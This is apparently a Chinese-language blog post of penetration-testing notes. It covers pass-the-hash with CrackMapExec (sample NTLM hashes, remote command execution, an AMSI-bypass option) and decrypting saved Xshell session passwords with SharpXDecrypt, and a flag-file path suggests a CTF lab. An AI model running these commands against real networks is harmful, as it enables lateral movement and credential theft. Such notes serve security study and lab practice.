内网渗透手段

Posted by Azeril on August 1, 2024

MSF使用详解-安全客 - 安全资讯平台 (anquanke.com)

内网渗透手段

哈希传递

CrackMapExec 域渗透工具使用-CSDN博客 Kerberos域渗透的那些事 - 先知社区 (aliyun.com)

适用场景:内网中大量主机密码相同。 hash 传递的原理是在认证过程中,并不是直接使用用户的密码进行认证的,而是使用用户的hash值,因此,攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不需要提供明文密码。在Windows系统中,通常会使用NTLM身份认证,NTLM是口令加密后的hash值。PTH是基于smb服务(139端口和445 端口

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"   //-x 是执行的命令
-x 通过cmd.exe 执行命令
-X 通过cmd.exe 调用执行powershell命令
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
或者使用ntlm hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
默认情况下会自动选择登录域-d可以指定域登录-x 要执行的命令
CME将按以下顺序执行命令
1.wmiexec通过WMI执行命令
2.atexe通过Windows任务调度程序调度任务来执行命令
3.smbexec通过创建和运行服务来执行命令

-X '$PSVersionTable' 使用查看powershell 版本环境命令 --amsi-bypass /path/payload 执行powershell

解密Xshell密码

K:\ADLAB\渗透>SharpXDecrypt.exe "C:\Users\c'x'k\Documents\NetSarang Computer\7\Xshell\Sessions"

image-20240802165637015


Creative Commons License
本作品采用CC BY-NC-ND 4.0进行许可。转载,请注明原作者 Azeril 及本文源链接。